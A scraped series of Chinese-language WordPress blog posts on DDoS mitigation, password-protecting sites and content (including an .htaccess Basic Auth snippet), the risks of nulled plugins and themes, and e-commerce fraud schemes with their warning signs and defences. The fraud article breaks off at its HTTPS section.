    然后,白名单通过仅允许已知流量访问您的站点来防止这两种情况发生。您无法获得DDoS攻击,因为您还没有预先批准这些IP范围或区域来访问您的站点。如果您的主要业务来自某些国家或地区,这是防止未知僵尸网络和攻击者访问您网站的有效方法。DDoS或蛮力或其他任何东西,如果你没有说“进来”,它就不会进来。

    WAF的这两种方法各有利弊,但总的来说,开发人员有一套强大的预定义策略,可以确保您的站点安全和有效运行。

    检查日志

    WordPress日志是大多数用户不知道或不关心的东西。但是,如果您面临DDoS攻击的风险,保留日志并查看流量来自何处以及您的服务器出现的任何错误对于确保一切正常运行都是非常宝贵的。请注意,在凌晨3点03分,来自世界另一端的176次登录尝试足以保证您的注意力并完成更新过程、进行备份、扫描和检查恶意软件等。

    你的主机应该有你可以查看的日志,WordPress Codex有关于调试日志的详细信息。

    选择优质服务器提供商

    一些大型的服务器提供商提供许多功能,可以减少您受到DDoS攻击的机会。

    比如集成Cloudflare的保护,该集成具有带有内置DDoS保护的安全防火墙。我们还利用严格的基于软件的限制来进一步保护您的网站。所有这些都使DDoS攻击更难通过。

    一旦DDoS攻击开始,另一个可以帮助抵御攻击功能是IP地理定位阻止。服务器防火墙将检测到任何DDoS攻击并提醒您注意。然后,您可以使用地理IP拦截功能来阻止DDoS攻击来自的地理区域。

    这意味着您可以安全地阻止攻击来自的地理区域,并且该区域的IP地址将不再能够向您的站点发送请求。

    然而,这是一个残酷的事实:无论您的托管服务提供商多么出色,他们都不可能提供针对DDoS攻击的全面保护。一个好的托管服务提供商会做的是提供一个好的防火墙,这将减少攻击的机会,但不会完全摆脱它。他们还将拥有您或他们可以用来在DDoS攻击开始后阻止它的工具,例如IP拦截。

    这就是为什么任何声称可以为您提供全面保护免受DDoS攻击的托管服务提供商并不是完全诚实的原因。它们可以降低攻击的可能性并限制攻击的影响,但它们不能完全阻止DDoS攻击。

    相反,为了更彻底地保护自己免受DDoS攻击,您需要使用一个庞大的网络,该网络可以使用其关于世界各地其他站点的攻击信息数据库来预测攻击并阻止它们可能来自的IP。让我们看一下其中的几个服务。

    Cloudflare

    Cloudflare是互联网上最受欢迎的内容交付网络提供商之一,它还提供针对攻击和黑客的保护。由于其庞大的规模,它可以访问有关DDoS攻击来自何处的信息,然后可以阻止其网络上所有站点的这些IP地址。

    Cloudflare DDoS保护

    Cloudflare DDoS保护

    Cloudflare的基于云的网络始终处于开启状态并始终在学习,这意味着它可以识别潜在的攻击并阻止不需要的流量24/7到达您的站点。它还为您提供了一个仪表板,您可以使用它来监控和缓解DDoS攻击,这样您就可以确定您的漏洞可能是什么。

    Sucuri

    Sucuri是一家以在黑客攻击后清理网站并帮助防止它们再次发生的服务而闻名的公司。但它也提供DDoS保护

    Sucuri DDoS防护

    Sucuri DDoS防护

    Sucuri的服务之所以有效,是因为它的规模如此之大,拥有超过400,000个客户的网络,这意味着它可以像Cloudflare一样保存攻击数据库。然后可以在您的站点上拦截这些IP地址。

    Sucuri的网络没有Cloudflare的那么大,但如果您还需要高级安全功能和监控,该公司值得考虑,这是他们的专长所在。Sucuri将监控您的站点是否存在停机时间和攻击或黑客攻击,并将修复发生的任何黑客攻击。

    因此,如果您确实遭受了DDoS攻击,并且您的WordPress网站在易受攻击时遭到黑客攻击,那么与Sucuri合作意味着您可以尽快启动并再次运行它。

    概括

    DDoS攻击正变得越来越普遍,它们有可能造成数十亿美元的损失。

    最后,大多数WordPress用户可能不会面临遭受DDoS攻击的风险。但没有人能预知意外。这就是为什么设置安全来处理它是如此重要。但是,只要您将内容发布在那里,成功并被公众看到,或者引起了错误的关注,您的生计就有可能受到威胁。如果人们真的愿意,可以很容易地雇用DDoS僵尸网络,因此设置WAF和一些日志记录并做好准备是非常值得的。

    完全保护自己免受DDoS攻击是不可能的,因为您无法控制进入您网站的流量。但是,如果您使用上述服务之一,避免廉价托管,并为DDoS攻击做好准备(如果确实发生了),那么您遭受损失的可能性就会小得多。

    不过,老实说,按照以往经验,当你遭遇充满恶意的DDos攻击,很多时候你只能够静默它过去。上述的手段自然有一定的作用,此外,增加DDoS攻击预防硬件防火墙也是有效的措施,但其起飞的价格让大部分小站长望而却步。

    对了,选择可临时超额使用配置的服务器也是一个不是方法的方法。

  • 如何使用密码保护您的WordPress网站

    如何使用密码保护您的WordPress网站

    寻找一种密码保护WordPress的方法?有很多不同的方法可以为您的网站添加密码保护,包括密码保护您的整个WordPress网站、仅保护特定内容,甚至仅保护其他公开内容的一部分。

    其中一些解决方案需要使用插件,而其他解决方案则使用您可以在服务器级别进行的核心WordPress功能或配置。

    在这篇文章中,我们将尝试涵盖尽可能多的不同方法。总的来说,您将学习:

    1. 如何使用密码保护您的整个WordPress网站
    2. 如何使用密码保护目录
    3. 如何使用密码保护文章、页面和WooCommerce产品
    4. 如何使用密码保护某个类别的WordPress文章
    5. 如何密码保护WordPress文章的一部分

    您可以单击上面的任何链接直接跳转到特定方法,或者您可以通读以了解如何使用密码保护您的WordPress网站的所有方法。

    如何使用密码保护您的整个WordPress网站

    如果你想用密码保护你的整个 WordPress 网站,你有两个主要选择:

    • 一个插件
    • 服务器级别的HTTP身份验证

    在这两者中,插件方法对于面向用户的站点来说肯定更加用户友好和更好,而HTTP身份验证是密码保护WordPress登台站点或其他类型的非面向用户站点的有效方法。

    如何使用插件对WordPress网站进行密码保护

    为了对您的整个WordPress网站进行密码保护,我们推荐Ben Huson提供的免费密码保护插件,该插件在WordPress.org上获得了很高的评价和可用。

    安装并激活插件后,您可以转到“设置”→“Password Protected”来配置插件的设置。

    选中Password Protected Status框以启用密码保护并在New Password框中输入所需的密码。

    该插件的另一个好处是它还为您提供了将某些类型的用户/请求以及IP地址列入白名单的选项。如果需要,您可以配置这些:

    如何使用密码保护您的整个WordPress网站

    如何使用密码保护您的整个WordPress网站

    激活它后,任何尝试访问您网站的人都需要在精简版的WordPress登录页面中输入密码:

    全站密码表格

    全站密码表格

    如果您想将登录页面徽标从通用WordPress徽标更改,您可以使用免费的Login Logo插件

    如何使用HTTP身份验证对WordPress网站进行密码保护

    通过基本的HTTP身份验证(又名htpasswd保护),您可以在人们加载您的网站之前添加额外的密码保护层,这就是为什么它是WordPress登台或开发网站的绝佳选择。

    您可以参考教程为您的WordPress网站启用htpasswd保护

    启用后,您的WordPress网站将需要身份验证才能访问它。您可以随时更改凭据或在不再需要时将其禁用。

    .htpasswd身份验证提示

    .htpasswd身份验证提示

    如何使用密码保护目录

    需要密码保护您网站上的目录?也许您有一个位于WordPress安装之外的文件夹,您不希望公众访问该文件夹。

    apache

    要手动设置,您首先需要创建一个 .htpasswd文件。您可以使用这个方便的生成器工具。然后将文件上传到您要保护的目录。

    www/user/public/protecteddirectory
    www/user/public/protecteddirectory
    www/user/public/protecteddirectory

    然后用下面的代码创建一个.htaccess文件,上传到你要保护的目录的路径下。确保更新目录路径和用户名。

    AuthType Basic
    AuthName “restricted area”
    AuthUserFile /www/user/public/protecteddirectory.htpasswd
    require valid-user
    AuthType Basic
    AuthName “restricted area”
    AuthUserFile /www/user/public/protecteddirectory.htpasswd
    require valid-user
    AuthType Basic  
    AuthName "restricted area"  
    AuthUserFile /www/user/public/protecteddirectory.htpasswd  
    require valid-user
    

    Nginx

    如果您正在运行Nginx,您还可以使用HTTP基本身份验证来限制访问。看看这个教程

    如果您使用具有cPanel的提供商进行托管,您可以使用位于“Files”部分下的“Directory Privacy”工具设置受密码保护的目录。

    cPanel目录隐私

    cPanel目录隐私

    如何使用密码保护文章、页面和WooCommerce产品

    如果您想对单个文章、页面或WooCommerce产品进行密码保护,WordPress实际上包含一个内置功能,可帮助您通过其Visibility设置进行设置。

    您将在WordPress编辑器中找到Visibility设置,因此您可以将它用于我们上面提到的每种类型的内容,以及您可能在您的网站上使用的任何其他自定义文章类型

    开始:

    • 打开要添加密码保护的内容的WordPress编辑器。
    • 在右侧边栏中找到Visibility选项。
    • 点击它。
    • 选择Password Protected并输入您要用于解锁文章的密码。

    这是新的WordPress区块编辑器中的样子:

    在区块编辑器中哪里可以找到可见性选项

    在区块编辑器中哪里可以找到可见性选项

    这是旧版经典WordPress编辑器中的样子:

    在哪里可以找到WordPress的可见性设置

    在哪里可以找到WordPress的可见性设置

    发布或更新内容后,系统将提示访问者输入密码,然后才能查看文章。此外,WordPress将在文章标题前添加“受保护”:

    内置WordPress密码保护的工作原理

    内置WordPress密码保护的工作原理

    这种方法的一个很酷的转折是,您实际上可以让人们通过一次输入密码来解锁多个文章。要进行此设置,您需要做的就是在多个文章中重复使用相同的密码。容易,对吧?

    一旦访问者输入一次密码,它会自动解锁所有使用相同密码的内容。但是,如果另一部分内容使用不同的密码,则访问者仍需要输入该唯一密码。

    最后,为了让您了解这种类型的密码保护如何适用于不同的内容,以下是它如何与WooCommerce产品一起使用。您可以看到Visibility控件显示在同一位置:

    如何使用密码保护WooCommerce产品

    如何使用密码保护WooCommerce产品

    如何使用密码保护某个类别的WordPress文章

    作为密码保护单个内容的替代方法,您还可以密码保护整个类别

    这种方法的好处是,它可以让您更轻松地为多个内容添加密码保护,并且对访问者来说也更简单,因为他们只需输入一次密码即可解锁该类别中的所有内容。

    不过,要设置此功能,您需要插件的帮助。我们推荐两种选择:

    1. Password Protected Categories,来自Barn2 Media的付费插件
    2. Access Category Password,WordPress.org上的免费插件

    如何使用Password Protected Categories

    Password Protected Categories的工作原理基本上是将您在上一节中看到的相同“密码保护”功能添加到您的类别中。

    安装并激活插件后,您可以转到文章 → 类别并编辑要添加密码的类别。在底部,您现在将看到用于密码保护单个内容的相同Visibility框。

    选择Password protected并输入您想要的密码。

    一件好事是该插件允许您添加多个密码,每个密码都将解锁该类别。这使您可以为每个人/组提供一个唯一的密码,以便将来在需要时更轻松地删除访问权限:

    如何将密码添加到类别

    如何将密码添加到类别

    保存更改后,每当访问者尝试访问受密码保护的类别中的文章时,都会提示他们输入密码:

    解锁类别的密码表格

    解锁类别的密码表格

    通过转到Settings → Protected Categories,您还可以访问一些额外的设置,让您控制插件的功能。你可以:

    • 设置密码的过期时间(例如,在访问者需要再次输入密码之前内容被解锁多长时间)。
    • 选择是否仍然在您网站的公共区域中显示受保护类别中的内容,或者是否在有人输入密码之前完全隐藏它们。
    • 自定义您在上面看到的登录表单。

    密码保护类别设置

    密码保护类别设置

    如果您经营的是WooCommerce商店,同一开发人员也有一个类似的插件,旨在与WooCommerce一起使用,称为WooCommerce Protected Categories

    如何使用Access Category Password

    Access Category Password可在WordPress.org免费获得。安装并激活它后,您可以转到设置→Access Category Password

    在那里,您可以:

    • 选择要使用的密码。
    • 选择要密码保护的类别。
    • 将某些用户角色列入白名单,以便他们无需输入密码即可查看隐藏类别。
    • 选择是使摘录仍然公开还是隐藏所有内容。
    • 自定义登录页面/密码保护通知。

    Access Category Password设置

    Access Category Password设置

    保存更改后,访问者在尝试访问受限类别中的任何内容时需要输入密码。

    虽然此插件是免费的,但一个缺点是您只能输入一个密码,并且您必须对要密码保护的所有类别使用相同的密码。

    如果您想为每个类别使用不同的密码,那么使用上面的受密码保护的类别插件可能会更好。

    这里的另一个区别是,即使在用户输入密码之前,Access Protected Categories仍然显示文章标题,而上面的Password Protected Categories插件隐藏了标题:

    Access Category Password表单

    Access Category Password表单

    如何密码保护WordPress文章的一部分

    最后,让我们看看如何用密码保护一部分公开的WordPress文章的最具体方法。

    要设置此功能,您可以使用WordPress.org上的免费Passster插件

    安装并激活插件后,转到设置 → Passster以生成用于限制内容的简码。

    输入您想要的密码并选择Generate Password

    Passster简码生成器

    Passster简码生成器

    然后,保存您的更改并复制Passster为您提供的简码:

    复制Passster简码

    复制Passster简码

    然后,将此短代码添加到您要使用密码保护的内容中。此外,编辑“Your content here”占位符并将其替换为您想要密码保护的内容:

    Passster短代码示例

    Passster短代码示例

    发布文章后,以下示例显示了默认密码保护表单的外观:

    Passster登录表单

    Passster登录表单

    要自定义此表单的外观,您可以使用 WordPress Customizer(外观 → 自定义)。

    在WordPress定制器中查找Passster部分。在那里,您将能够自定义表单的文本和颜色:

    WordPress定制器中的Passster样式选项

    WordPress定制器中的Passster样式选项

    概括

    无论您是想限制对整个网站、部分内容的访问,还是介于两者之间的访问权限,您都可以通过多种方式对WordPress进行密码保护。

    选择最适合您的方法,按照我们教程中的步骤操作,并享受新的WordPress密码保护功能。

  • 为什么你应该停止使用无效的WordPress插件和主题

    为什么你应该停止使用无效的WordPress插件和主题

    没有人喜欢花不必要的钱——这是人之常情。即使是世界上最富有的人之一,沃伦巴菲特,仍然会搜索他购买的汽车的折扣(好吧,也许这是一个极端的例子——你明白了)。

    因为人们总是在寻找降低成本的方法,一些WordPress用户倾向于转向无效的WordPress主题和插件,而不是为官方高级版本付费

    在这篇文章中,我们将告诉您为什么使用无效的WordPress插件和主题是一个坏主意……即使它不一定违反任何法律。

    什么被认为是空插件和主题?

    当涉及到术语无效时,网络上有各种定义。正如我们定义的那样,它指的是高级 WordPress 插件或主题已被黑客入侵或包含旨在造成伤害或收集信息的修改代码。这些是从第三方网站(不是原始作者或创建者)获得的,有时无需许可证密钥即可工作。

    无效的WordPress插件和主题不一定是非法

    让我们从房间里的大象开始……

    如果您使用无效的WordPress插件或主题,FBI不太可能会敲门。这是因为,与人们通常“盗版”的其他内容(例如音乐、电影)相比,无效的WordPress插件和主题通常不会违反法律。

    这里的原因与GPL(通用公共许可证)有关。如果不将此作为版权课程,您只需要知道GPL许可允许的部分内容是任何人都可以自由分发GPL许可软件(是的——甚至是高级GPL许可软件)。

    因此,如果一个无效的插件站点将一个GPL许可软件供下载,从技术上讲,他们并没有违法,因为他们有权自由分发该GPL代码。

    GPL是WordPress的重要组成部分,大多数(但不一定是全部)WordPress主题和插件都使用 GPL。这部分是因为主题和插件必须符合GPL才能在WordPress.org目录中列出。

    虽然高级插件不需要GPL许可证,但许多插件在WordPress插件库上也有免费增值版本,然后需要GPL许可证。或者他们选择拥有GPL许可证。许多高级插件,如WP Rocket和Gravity Forms都是GPL许可的。

    还有其他原因——比如能够在插件和主题中使用现有的GPL许可代码。通常,如果您在产品中使用现有的GPL许可代码,则必须在GPL下发布后续产品(这就是2017年WordPress和Wix之间争吵的原因)。

    GPL很复杂,我们过度简化了一些原则,以将核心思想浓缩成几段。但基本上——你看到的大多数无效的WordPress插件和主题可能没有做任何违法的事情。事实上,GPL是WordPress出色的原因之一。

    但这并不意味着你应该出去把你的网站装满无效的扩展……

    仅仅因为无效的扩展是合法的,这并不意味着在您的WordPress网站上使用它们是一个好主意。

    以下是您仍然不应在您的网站上使用无效插件或主题的四个原因。

    1. 你不知道代码中还有什么
    2. 开发人员需要资金来继续改进他们的产品
    3. 您不会从开发人员那里获得任何支持
    4. 您不会获得任何自动更新

    1.你不知道代码中还有什么

    当您从开发人员以外的来源(或受信任的插件库,如WordPress.org)下载扩展程序时,您不知道代码中还隐藏着什么。

    恶意行为者喜欢使用无效的插件或主题来插入他们自己讨厌的有效载荷,例如为SEO注入链接,甚至更险恶的行为。

    当您使用空扩展时,您将自己暴露在这种类型的漏洞中,因为除非您有知识和时间来挖掘所有代码,否则您不知道空扩展中还隐藏着什么。

    除此之外,您可能会取消主机的任何潜在帮助。例如,服务器提供商提供免费的黑客修复保证,但如果您的WordPress网站由于无效插件或主题中的后门而被黑客入侵,则此保证不适用。

    这不是一个普遍的问题,因为您可以找到提供清洁产品的合法GPL俱乐部(通常按月收费)。但是,即使您为提供免费下载恶意代码的GPL俱乐部付费,这些扩展不是一个好主意还有其他重要原因。你怎么知道哪个GPL俱乐部可以信任?

    付费GPL俱乐部的示例

    付费GPL俱乐部的示例

    这就是为什么我们通常将从第三方网站获得的插件称为无效的。如果您不是从原作者那里获得它,那么假设它可能已经修改、不安全的代码,甚至是病毒,这样会更安全。您可以使用像VirusTotal这样的在线工具来扫描插件或主题的文件,以查看它是否检测到任何类型的恶意软件。

    Virus Total

    Virus Total

    2. 开发人员需要资金来继续改进他们的产品

    虽然大多数开发人员确实喜欢创建WordPress产品,但他们中的大多数人也喜欢吃东西并负担得起。

    也就是说,WordPress开发人员需要收入才能证明他们花在维护和改进产品上的时间是合理的。

    当您使用无效的扩展程序时,您将剥夺他们可以用来进一步增强其插件的收入。

    基本上,你是在自取其辱!

    如果每个人都使用无效版本,Elementor页面构建器团队是否能够继续推出新功能,例如主题构建?如果没有钱进来,OceanWP主题会拥有所有这些很棒的附加组件吗?

    不!当然不是。

    如果您不遗余力地寻找插件或主题的无效版本,这可能意味着您认为它是您网站的宝贵补充。

    因此,即使您认为开发人员为构建您的产品所付出的所有辛勤工作不值得支付,您为什么要剥夺自己在未来获得更好产品的机会?

    基本上,你应该帮助开发人员把食物摆在桌面上,这样他们就可以继续创造让你的生活更轻松的很棒的东西。

    3. 你不会得到开发者的任何支持

    无效的扩展可以让您获得高级插件或主题的所有功能,但它们永远无法让您获得付费客户获得的所有好处。

    这是因为您使用GPL许可软件所支付的很大一部分费用是来自开发人员的支持

    当您为产品付款时,如果您遇到任何产品问题,您可以选择直接与开发人员联系。

    另一方面,使用无效的扩展名,您将获得零支持。碰钉子?希望谷歌有所帮助!因为这几乎是你唯一的选择。如果您使用的插件在 WordPress 存储库中有免费版本,您也许可以在那里得到响应。但说实话,这很像玩彩票。这仅仅是因为开发人员根本负担不起免费工作。

    如果你浪费了三个小时来解决一个开发者可以在五分钟内为你解决的问题,你到底真的“省钱”了吗?可能不会(如果您珍惜时间)。

    4. 你不会得到任何自动更新

    为了启用高级插件或主题的自动更新,您将需要一个许可证密钥。

    如果没有有效的许可证密钥,您将不得不在每次有新更新时手动更新扩展。

    这有两个大问题:

    首先,这很烦人且耗时。您不必简单地单击一个按钮,而不必每次都删除并重新上传插件。

    没有许可证密钥不提供更新

    没有许可证密钥不提供更新

    不过,这还不是最大的问题

    更重要的是,您将不再在WordPress仪表盘中收到红色更新通知。这意味着您必须找到另一种方法来跟踪新更新何时发布。

    如果开发人员发布了紧急安全修复程序,但您直到几周后才收到备忘录怎么办?过时的扩展是WordPress网站的一大攻击媒介,因此如果您无法及时应用新的更新,您的网站就会面临不必要的风险。

    确实有些GPL俱乐部会去获取最新版本,然后他们会在他们的网站上发布更新。但是你想信任谁呢?拥有一千个不同插件的GPL俱乐部,或者插件的开发者。这种风险值得节省几块钱吗?

    例外

    我们看不到使用无效插件或主题的任何充分理由。但是,如果您真的想挑剔,这是我们个人从用户那里听到的一种情况。

    许多高级WordPress插件没有免费版本或试用版,并且它们的退款政策可能仅适用于由于技术原因插件无法工作的情况。很多时候,插件开发人员必须严格遵守他们的退款政策,以防止那些试图获得免费副本的人滥用。

    如果您是WordPress开发人员、代理机构或自由职业者,在某些情况下您可能只需要查看插件是否适用于客户。如果插件最终无法满足您的需求,购买插件可能并不总是有意义。因为那样你就没有钱了。

    在本地或临时站点(从不生产)上测试无效的插件或主题 可能是您决定走的路线。我们不会在我们的网站上分享从哪里获得这些内容。

    如果您这样做并发现插件或主题确实提供了,那么请务必与您的客户聊天并购买它以获得合法的许可证密钥、支持和更新。

    不要在生产站点上使用空扩展——这不值得

    从表面上看,免费获得高级插件或主题似乎很划算。但在我们看来,这不值得。即使你找到了合法、干净的GPL插件和主题的来源,你仍然会浪费额外的时间,因为你:

    • 由于您无法获得支持,因此必须自己配置和修复所有内容。
    • 将不得不不断检查新版本并手动更新自己。

    时间就是金钱,无效的插件和主题将花费您更多的时间来使用。

    除此之外,你只是剥夺了开发人员已经投入的辛勤工作的回报,以及继续改进他们的产品的资金。即使您对那里的道德影响没有任何问题,如果每个人都使用无效扩展,您也会失败,因为开发人员没有动力进行改进。

    所以 – 当涉及到无效安装时 – 在安装主题或插件之前请三思而后行。特别是如果您正在构建或在其他人的 WordPress 网站上工作。以后不要让您的客户陷入困境。我们已经多次看到这种快乐的方式。

    如果您真的有预算,请考虑WordPress.org上提供的55,000多个免费插件和数千个免费WordPress主题之一。

  • 电子商务欺诈预防:7种最严重的诈骗以及如何预防

    电子商务欺诈预防:7种最严重的诈骗以及如何预防
    您的怀疑是正确的:电子商务欺诈正在增加。根据 LexisNexis Risk Solutions的一项年度研究,准确地说是上涨了近30% 。更令人不安的是: 根据Digital Commerce 360​​的数据,这个数字几乎是电子商务销售额增长的两倍

    更糟糕的是,电子商务商家必须在两个不同的战线上打击欺诈行为。一方面,您必须保护自己免受专门针对商家的计划的影响,例如欺诈性退款或网站模仿(见下文)。

    但最重要的是,您还必须保护您的客户免受诈骗。在您的网站上窝藏诈骗者对于在线商店来说是一个死亡之吻,即使您和购物者一样都是受害者。

    幸运的是,电子商务欺诈预防也在 增加,其方法与他们挫败的骗局一样复杂。在本文中,我们概述了7种最严重和最常见的电子商务欺诈诈骗:它们的工作原理、需要注意的警告信号、最佳防御措施以及 10 种用于优化安全性的电子商务欺诈预防工具。

    1. 需要注意的7种最糟糕的电子商务欺诈诈骗
    2. 电子商务欺诈警告标志:在骗局开始之前阻止骗局
    3. 电子商务欺诈预防:您的铁腕防御
    4. 电子商务欺诈预防的10大最佳工具

    需要注意的7种最糟糕的电子商务欺诈诈骗

    您防范电子商务欺诈的第一道防线就是知道要注意什么。以下是在线商店最容易受到的7种最常见的骗局。

    1. 电子邮件帐户网络钓鱼

    大多数人都熟悉电子邮件网络钓鱼诈骗,所以让我们从那里开始。这些与互联网本身一样古老,所以你们中的许多人可能已经打开了一封来自陌生人的电子邮件,要求提供敏感的帐户信息。

    但是,最近我们看到冒充尼日利亚王子,而是冒充电子商务商店的诈骗者有所增加。他们发送伪装成订单/交货确认的电子邮件,旨在提取敏感帐户数据或将受害者引导至欺诈网站。

    冒充亚马逊的网络钓鱼电子邮件示例

    冒充亚马逊的网络钓鱼电子邮件示例(图片来源:SecureWorld)

    在最好的情况下,这些会导致意外的广告页面而不是官方商店页面。其他时候,它不是那么无害。网络钓鱼电子邮件中的链接通常会进入带有病毒、恶意软件或其他与黑客相关的不幸事件的站点。这就是为什么总是建议将鼠标悬停在可疑链接上而不是单击它们。

    2.身份盗用

    如果某个可怜的灵魂在网络钓鱼电子邮件中丢失了他们的帐户信息,接下来会发生什么?骗子获取了这些信息并为自己购买了一堆昂贵的礼物,并猜测谁支付了账单。冒充他人并使用他们的财务信息进行购买被称为身份盗用。

    听起来很奇怪,零售商往往是身份盗窃受害最深的人:信用卡公司通常会代表受害者发起退款,但没有义务退回商品。即使零售商设法回收产品,它们也不再是新产品。零售商能够毫发无损地逃脱身份盗窃的唯一方法是在它开始之前阻止它。

    还值得一提的是,网上商店也需要提防在不知情的情况下成为身份盗用的帮凶。如果您的网站不安全,黑客可以从您的眼皮底下窃取您客户的信息——就像2013年Target黑客事件中的百万美元案件一样。

    3. 页面劫持

    您在一个您之前使用过数百次的网站上,但是这一次,在这个特定的页面上,有些东西似乎……关闭了。可能是该网站的其中一个页面被劫持了。页面劫持是指黑客创建模仿现有网站的欺诈性网页。

    更高级的案例包括劫持一个排名靠前的网站并窃取其搜索引擎流量。页面劫持也通常与“捕鼠器”相关联,在这种情况下,页面会阻止用户退出,例如,每次用户尝试关闭浏览器时都会打开一个新窗口,或者在他们的计算机上充斥着无休止的弹出窗口。

    但就电子商务而言,页面劫持是另一种有效的网络钓鱼技术,例如模仿网站的登录页面来收集用户名和密码。电子商务品牌最不想要的就是他们的客户每次登录时都会对他们的合法性进行第二次猜测。

    4. 退款欺诈

    退款欺诈非常简单,而且非常普遍。基本上,诈骗者购买了一个大型电子商务订单,然后在发货后取消付款。他们在商品到达时保留商品,无需支付一分钱。

    方法各不相同,尽管它可以像骗子自己打电话给信用卡公司并说他们的身份被盗一样简单。

    另一种流行的技术是声称交货从未到达,因此诈骗者免费收到重复订单。即使骗局被及时发现,即使在最好的情况下,商家仍然必须调查虚假索赔。

    更糟糕的是,商家必须将“友好欺诈”与实际的拒付欺诈区分开来。

    友好欺诈是指合法客户意外造成拒付欺诈,例如错过包裹递送或输入错误的付款详细信息。商家对退单是出于恶意还是只是一次意外一无所知,担心会因欺诈指控冒犯善意的客户。

    在订阅模式下运营的电子商务品牌经常处理友好的欺诈行为,因为客户声称他们不知道这些费用会重复发生。 订阅品牌最好在客户注册之前明确收费。

    5.三角欺诈

    让我们进入更高级的欺诈计划,为更聪明和有经验的骗子保留。为了解释三角测量欺诈的工作原理,让我们将其分解为几个步骤。

    1. 骗子为具有显着价格标记的真实产品创建虚假列表。这也不总是那么欺诈。像eBay这样的网站允许用户在没有验证的情况下发布和销售商品。
    2. 客户从虚假列表中“购买”产品,向诈骗者提供所有个人数据。
    3. 诈骗者获取客户的数据并在不同的站点以更少的价格为他们购买相同的商品。他们将物品运送给客户。
    4. 客户收到他们购买的商品,却没有意识到他们多付了钱。骗子保留加价利润。

    这个骗局最狡猾的部分之一是受害者甚至不一定知道他们被骗了

    此外,成功的三角测量欺诈者会积累一长串的账户数据和信用卡号码。通常情况下,他们在第 3 步使用不同的信用卡来消除气味。

    这意味着三角欺诈的受害者可能会在数月或数年后再次在不相关的骗局中使用他们的数据。

    6. 联盟欺诈

    特别针对具有会员计划的电子商务商家,会员欺诈是指诈骗者操纵或滥用会员链接以获得更大的回报。换句话说,如果会员为他们发送网站的每个访问者而获得报酬,那么诈骗者可以使他们看起来好像他们发送的访问者比他们实际发送的更多,从而获得更高的薪水。

    联盟欺诈通常涉及黑客和自动化系统,但在某些情况下,它可以像使用稳定的虚假配置文件一样简单。诈骗者通常必须具备一定水平的计算机技能才能巧妙地避免被发现。

    7. 供应商身份欺诈

    最后,另一个针对商家的欺诈计划:骗子冒充制造商、批发供应商或其他B2B企业,承诺提供他们从未打算提供的服务。在线商店注册,交了一些钱,但再也没有收到供应商的消息。

    这些骗局在网络钓鱼甚至网页劫持等其他骗局中发挥了很大作用,最大的区别在于它们针对的是企业而不是消费者。这是我们始终建议彻底研究与您开展业务的人的原因之一。

    电子商务欺诈警告标志:在骗局开始之前阻止骗局

    一盎司的预防胜过一磅的治疗。

    预防电子商务欺诈的最有效方法是及早识别警告信号以避免它们。以下是每个在线商店都应注意的一些危险信号:

    • 送货地址和帐单地址不同。 就好像身份盗用和三角欺诈经常发生的情况一样,卡的所有者没有收到货物。
    • 同一商品的多个订单。电子商务欺诈者倾向于瞄准高价商品,当他们找到自己喜欢的商品时,他们会一遍又一遍地使用它。无论如何,货物通常都被围起来,所以它更多的是关于货币价值而不是实际产品。
    • 多个订单到同一地址但不同的卡。过度使用相同的被盗卡号会引起不必要的关注和怀疑,因此有经验的诈骗者喜欢更改它……而且使用不同的信用卡号比将货物运送到不同的地址更容易(请务必查看我们的指南,了解如何使用Stripe Radar预防和减少98%的信用卡欺诈)。
    • 可疑的大订单(尤其是加急运输)。与大多数犯罪一样,诈骗者希望确保回报值得冒险。这就是为什么电子商务诈骗经常涉及大订单,以防这是欺诈者的最后一次。他们还希望交易所在受害者流行之前尽快通过,从而加快运输速度。
    • 可疑的电子邮件地址或电话号码。身份盗用很少是万无一失的——通常有一两个漏洞。继续留意看起来不相干的电子邮件地址(不同的姓名、冒充个人的公司等)以及可疑的电话号码(即与帐单地址不同的国家或地区代码)。
    • 重复拒绝交易。每个人都会发生一次或两次交易被拒绝,但反复拒绝交易是一个危险信号。尽管有时是无辜的,但这可能表明有人试图猜测他们无法合法访问的敏感信息。

    电子商务欺诈预防:您的铁腕防御

    既然您知道所有可能发生在您身上的不幸,让我们继续讨论您在这里的真正原因:确保它不会发生!这是有关电子商务欺诈预防和保护您的在线商店免受欺诈的最佳建议。

    PCI合规性

    首先,从电子商务欺诈预防的官方指南开始:支付卡行业安全标准委员会 (PCI SSC)。基本上,世界上最大的信用卡品牌齐聚一堂,列出了一系列避免诈骗的最佳做法。将这些视为预防电子商务欺诈的最低要求,也是一个很好的起点。

    幸运的是,许多支付网关可以为您处理PCI合规性,因此您可以通过选择更安全的网关来直接解决问题。您可以通过PCI SSC博客直接访问源代码。

    PCI安全标准委员会

    PCI安全标准委员会

    AVS和CVV

    打击欺诈更容易实现的目标:地址验证服务 (AVS) 和卡验证值 (CVV)。这些标准安全措施比建议更接近规则。

    AVS 确保输入的帐单地址与记录的帐单地址一致,而CVV要求客户输入卡背面的三位数代码(以防身份窃贼仅窃取卡号,而不是实际卡)。

    这两种保护措施通常都包含在支付处理器中,因此在选择您的之前确保它们存在。

    交货时要求签名

    由于涉及虚假身份的电子商务骗局如此之多,物理签名可能会带来很大的影响。尽管此选项可能会根据您的运输方式花费额外费用,但它是防止身份盗用、欺诈性拒付和三角测量计划的一个很好的防御措施。

    如果诈骗者试图说服您他们是其他人,或者货物从未送达,那么所需的签名就会使他们陷入自己的陷阱。

    亲自跟进

    骗子喜欢懒惰的受害者。他们从不看两次。

    成功的骗局包括事情从裂缝中掉下来,因此最有效的预防措施之一是跟进怀疑。如果您有空闲时间,多加注意和肘部油脂可以准确地揭示骗子不希望您看到的内容。考虑以下选项:

    • 亲自向客户发送电子邮件,以查看他们的电子邮件地址是否真实。 如果您礼貌地解释您的怀疑,无辜的客户不会介意,但诈骗者不会知道该怎么做。在他们的回答中注意语法和拼写,看看英语是否是他们的第二语言。
    • 在社交媒体上验证此人。搜索他们的姓名和/或用户名以查看他们是否真实,以及他们的个人资料是否与他们的其他信息匹配。
    • 拨打客户的电话。这是验证某人是他们所说的人的最快途径。
    • 延迟发货。正如我们所说,诈骗者希望他们的操作尽快完成,以减少被抓的机会。如果您故意延迟发货,并告诉他们太多,可能会吓跑他们。这会给诚实的购物者带来不便,因此请仅在必要时使用。

    当然,你没有时间为每一个订单都做这一切,所以一个好的开始是培养你的直觉。学会及早识别可疑订单,如果你觉得有什么不对劲——哪怕只是一点点——千万不要忽视它。

    始终使用HTTPS

